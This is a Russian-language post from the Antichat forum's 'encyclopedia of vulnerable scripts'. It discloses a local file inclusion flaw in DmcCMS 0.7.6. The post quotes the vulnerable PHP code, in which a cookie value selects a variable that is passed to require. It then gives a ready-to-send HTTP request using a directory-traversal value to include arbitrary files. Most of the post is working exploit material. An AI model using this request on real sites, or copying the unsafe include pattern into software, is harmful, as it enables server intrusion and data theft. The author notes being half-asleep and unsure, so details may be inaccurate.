Форум АНТИЧАТ - Показать сообщение отдельно - Энциклопедия уязвимых скриптов

Product: DmcCMS
Author: http://sourceforge.net/projects/dmcms/
Version: 0.7.6

LFI

Пришлось немножко подумать,над тем как тут провернуть LFI, мой сонный мозг выдал мне этот вариант.Итак вот он:
/*Для реализации необходим register_globals = ON */
file: user_language.php

PHP код:


		
			
if (!isset($_COOKIE["deeemm_language"])) {

  $language = '1';

  session_start();

  $_SESSION['language'] = $language;

  header("Cache-control: private"); //IE6 session control fix

  header('P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"'); //bypass 3rd party policy

  setcookie("deeemm_language" ,$language ,time()+60*60*12*365 );

}

  elseif (isset($_COOKIE["deeemm_language"])) {

  session_start();

  header("Cache-control: private"); //IE6 session control fix

  $language = $_COOKIE["deeemm_language"];

}

....

$sql_query = mysql_query("SELECT * FROM `" . $db_table_prefix . "admin` WHERE `id` = 0");

  while($sql_result = mysql_fetch_array($sql_query)) {

    $language_1_flag = $sql_result[language_1_flag];

    $language_2_flag = $sql_result[language_2_flag];

    $language_3_flag = $sql_result[language_3_flag];

    $language_4_flag = $sql_result[language_4_flag];

  }

...

$language_file = 'language/' . ${'language_' . $language} . '.php';

require $language_file;

target: Отправляем запрос, где:

Код:

GET target/user_language.php?language_666=../../LFI HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Keep-Alive: 300
Connection: keep-alive
Cookie: deeemm_language=666;
Cache-Control: max-age=0

Ну вот и все,получаем инклуд файла,в переменной: language_666.
Вроде бы правильно все,не пинать,спать хочу очень

Если что,поправьте я утром исправлю сообщение.
/*PS: на сегодня ставил задачу как можно больше разобраться в лфи\рфи,поэтому концентрировал все внимание на инклудах.Завтра еще раз просмотрю эти движки,и если будет что-то еще - добавлю.Споки ноки*/